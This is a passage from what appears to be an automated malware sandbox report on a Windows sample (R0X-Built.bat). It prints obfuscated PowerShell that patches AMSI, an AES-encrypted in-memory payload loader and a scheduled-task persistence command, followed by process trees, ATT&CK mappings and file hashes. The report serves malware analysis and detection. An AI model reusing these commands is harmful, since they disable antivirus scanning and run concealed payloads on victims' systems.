IPRm.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+'k'+'e'+'',''+'P'+'u'+'b'+''+'l'+''+'i'+''+'c'+','+'H'+''+'i'+''+'d'+'e'+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+''+'t'+''+[Char](44)+''+[Char](86)+'i'+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$vbbxyTXchR,$drcXQtlxKKbwAx).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+'e'+[Char](44)+''+'M'+'a'+[Char](110)+'a'+[Char](103)+''+'e'+''+'d'+'');Write-Output $tfUciSfIPRm.CreateType();}$XDzDUpcqwQRrX=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+'s'+[Char](116)+''+[Char](101)+''+'m'+'.'+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+[Char](111)+''+'s'+''+[Char](111)+''+'f'+''+'t'+''+'.'+''+[Char](87)+''+[Char](105)+'n'+'3'+'2.'+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$MReoAfzuPWwKwu=$XDzDUpcqwQRrX.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+'cAd'+'d'+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pu'+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$bjsiiHnvWsmVeQHRzwh=SaKyHMEZbXiX @([String])([IntPtr]);$sFXwOEmxsHgnQCOErSyXKr=SaKyHMEZbXiX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$TlHKqCPBUfP=$XDzDUpcqwQRrX.GetMethod(''+[Char](71)+'e'+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+'e'+'Ha'+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.'+[Char](100)+''+'l'+'l')));$KrvbtswIJwajxW=$MReoAfzuPWwKwu.Invoke($Null,@([Object]$TlHKqCPBUfP,[Object]('L'+'o'+'a'+[Char](100)+''+[Char](76)+'ib'+'r'+''+[Char](97)+''+[Char](114)+''+'y'+''+[Char](65)+'')));$fmkTGqhbJDLZbvSCQ=$MReoAfzuPWwKwu.Invoke($Null,@([Object]$TlHKqCPBUfP,[Object](''+[Char](86)+'i'+[Char](114)+'t'+[Char](117)+'a'+[Char](108)+''+[Char](80)+''+[Char](114)+''+'o'+'t'+'e'+''+'c'+''+[Char](116)+'')));$kKpiDGE=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($KrvbtswIJwajxW,$bjsiiHnvWsmVeQHRzwh).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+'l');$ddTghAFtXOTurWrpb=$MReoAfzuPWwKwu.Invoke($Null,@([Object]$kKpiDGE,[Object](''+[Char](65)+'m'+'s'+''+[Char](105)+'S'+[Char](99)+'an'+[Char](66)+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$fctBeENSHh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fmkTGqhbJDLZbvSCQ,$sFXwOEmxsHgnQCOErSyXKr).Invoke($ddTghAFtXOTurWrpb,[uint32]8,4,[ref]$fctBeENSHh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ddTghAFtXOTurWrpb,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fmkTGqhbJDLZbvSCQ,$sFXwOEmxsHgnQCOErSyXKr).Invoke($ddTghAFtXOTurWrpb,[uint32]8,0x20,[ref]$fctBeENSHh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+[Char](70)+'TW'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+'7'+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1196

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1204

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1316

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1412

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1444

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1528

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:1060

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1632

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1640

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1752

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1772

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1792

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2140

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2268

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2360

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2440

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2492

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2560

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2768

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:1344

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3344

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\R0X-Built.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kV2tB9nO4F4vksE1XanCNN0CKaoOh+Fwv5J9FKyM/rQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GDJTUCxdRiEvidahg0KvVw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $qBwZy=New-Object System.IO.MemoryStream(,$param_var); $HWMGu=New-Object System.IO.MemoryStream; $jHVMR=New-Object System.IO.Compression.GZipStream($qBwZy, [IO.Compression.CompressionMode]::Decompress); $jHVMR.CopyTo($HWMGu); $jHVMR.Dispose(); $qBwZy.Dispose(); $HWMGu.Dispose(); $HWMGu.ToArray();}function execute_function($param_var,$param2_var){ $RLZnq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DuryM=$RLZnq.EntryPoint; $DuryM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\R0X-Built.bat';$fOqeP=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\R0X-Built.bat').Split([Environment]::NewLine);foreach ($ishbx in $fOqeP) { if ($ishbx.StartsWith(':: ')) { $wXPsE=$ishbx.Substring(3); break; }}$payloads_var=[string[]]$wXPsE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$srr-powershell" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
4⤵
- Creates scheduled task(s)
PID:4532

C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"
4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:3928

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
4⤵
- Executes dropped EXE
PID:4740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3500

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3844

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3904

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3964

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4184

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4428

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4732

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:572

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:1452

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:5048

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1568

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4508

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4684

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4768

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

Scheduled Task/Job

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Subvert Trust Controls

1

T1553

Install Root Certificate

Modify Registry

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_olhds4qc.2jp.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\install.exe
Filesize
162KB

MD5
152e3f07bbaf88fb8b097ba05a60df6e

SHA1
c4638921bb140e7b6a722d7c4d88afa7ed4e55c8

SHA256
a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc

SHA512
2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

Download Submit
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe
Filesize
411KB

MD5
bc4535f575200446e698610c00e1483d

SHA1
78d990d776f078517696a2415375ac9ebdf5d49a

SHA256
88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

SHA512
a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

Download Submit
memory/464-117-0x0000027E9B570000-0x0000027E9B59B000-memory.dmp

Filesize
172KB

Download
memory/464-118-0x00007FFAC0570000-0x00007FFAC0580000-memory.dmp

Filesize
64KB

Download
memory/464-111-0x0000027E9B570000-0x0000027E9B59B000-memory.dmp

Filesize
172KB

Download
memory/636-76-0x0000025560E00000-0x0000025560E25000-memory.dmp

Filesize
148KB

Download
memory/636-78-0x0000025560E30000-0x0000025560E5B000-memory.dmp

Filesize
172KB

Download
memory/636-85-0x00007FFAC0570000-0x00007FFAC0580000-memory.dmp

Filesize
64KB

Download
memory/636-84-0x0000025560E30000-0x0000025560E5B000-memory.dmp

Filesize
172KB

Download
memory/636-77-0x0000025560E30000-0x0000025560E5B000-memory.dmp

Filesize
172KB

Download
memory/692-89-0x0000015B54100000-0x0000015B5412B000-memory.dmp

Filesize
172KB

Download
memory/692-96-0x00007FFAC0570000-0x00007FFAC0580000-memory.dmp

Filesize
64KB

Download
memory/692-95-0x0000015B54100000-0x0000015B5412B000-memory.dmp

Filesize
172KB

Download
memory/760-122-0x000001E0631D0000-0x000001E0631FB000-memory.dmp

Filesize
172KB

Download
memory/988-107-0x00007FFAC0570000-0x00007FFAC0580000-memory.dmp

Filesize
64KB

Download
memory/988-106-0x00000242EEEF0000-0x00000242EEF1B000-memory.dmp

Filesize
172KB

Download
memory/988-100-0x00000242EEEF0000-0x00000242EEF1B000-memory.dmp

Filesize
172KB

Download
memory/1676-41-0x0000000074660000-0x0000000074E11000-memory.dmp

Filesize
7.7MB

Download
memory/1676-59-0x0000000006890000-0x00000000068D6000-memory.dmp

Filesize
280KB

Download
memory/1676-43-0x0000000074660000-0x0000000074E11000-memory.dmp

Filesize
7.7MB

Download
memory/1676-728-0x0000000074660000-0x0000000074E11000-memory.dmp

Filesize
7.7MB

Download
memory/1676-32-0x0000000074660000-0x0000000074E11000-memory.dmp

Filesize
7.7MB

Download
memory/2880-50-0x000001D63D200000-0x000001D63D222000-memory.dmp

Filesize
136KB

Download
memory/2880-60-0x000001D63D270000-0x000001D63D29A000-memory.dmp

Filesize
168KB

Download
memory/2880-62-0x00007FFAFE430000-0x00007FFAFE4ED000-memory.dmp

Filesize
756KB

Download
memory/2880-61-0x00007FFB004E0000-0x00007FFB006E9000-memory.dmp

Filesize
2.0MB

Download
memory/3104-66-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3104-73-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3104-63-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3104-64-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3104-65-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/3104-70-0x00007FFAFE430000-0x00007FFAFE4ED000-memory.dmp

Filesize
756KB

Download
memory/3104-69-0x00007FFB004E0000-0x00007FFB006E9000-memory.dmp

Filesize
2.0MB

Download
memory/3104-68-0x0000000140000000-0x0000000140008000-memory.dmp

Filesize
32KB

Download
memory/4004-23-0x0000000007B60000-0x0000000007BCC000-memory.dmp

Filesize
432KB

Download
memory/4004-18-0x0000000006930000-0x000000000697C000-memory.dmp

Filesize
304KB

Download
memory/4004-0-0x000000007466E000-0x000000007466F000-memory.dmp

Filesize
4KB

Download
memory/4004-49-0x0000000074660000-0x0000000074E11000-memory.dmp

Filesize
7.7MB

Download
memory/4004-24-0x0000000008810000-0x0000000008DB6000-memory.dmp

Filesize
5.6MB

Download
memory/4004-27-0x0000000008140000-0x000000000817C000-memory.dmp

Filesize
240KB

Download
memory/4004-22-0x0000000007B20000-0x0000000007B5E000-memory.dmp

Filesize
248KB

Download
memory/4004-21-0x0000000006F30000-0x0000000006F38000-memory.dmp

Filesize
32KB

Download
memory/4004-19-0x0000000008190000-0x000000000880A000-memory.dmp

Filesize
6.5MB

Download
memory/4004-26-0x0000000007E90000-0x0000000007EA2000-memory.dmp

Filesize
72KB

Download
memory/4004-20-0x0000000006EE0000-0x0000000006EFA000-memory.dmp

Filesize
104KB

Download
memory/4004-25-0x0000000007CC0000-0x0000000007D52000-memory.dmp

Filesize
584KB

Download
memory/4004-17-0x0000000006900000-0x000000000691E000-memory.dmp

Filesize
120KB

Download
memory/4004-16-0x0000000006410000-0x0000000006767000-memory.dmp

Filesize
3.3MB

Download
memory/4004-9-0x0000000074660000-0x0000000074E11000-memory.dmp

Filesize
7.7MB

Download
memory/4004-5-0x0000000006330000-0x0000000006396000-memory.dmp

Filesize
408KB

Download
memory/4004-6-0x00000000063A0000-0x0000000006406000-memory.dmp

Filesize
408KB

Download
memory/4004-4-0x0000000005B50000-0x0000000005B72000-memory.dmp

Filesize
136KB

Download
memory/4004-3-0x0000000074660000-0x0000000074E11000-memory.dmp

Filesize
7.7MB

Download
memory/4004-2-0x0000000005C90000-0x00000000062BA000-memory.dmp

Filesize
6.2MB

Download
memory/4004-1-0x0000000003530000-0x0000000003566000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads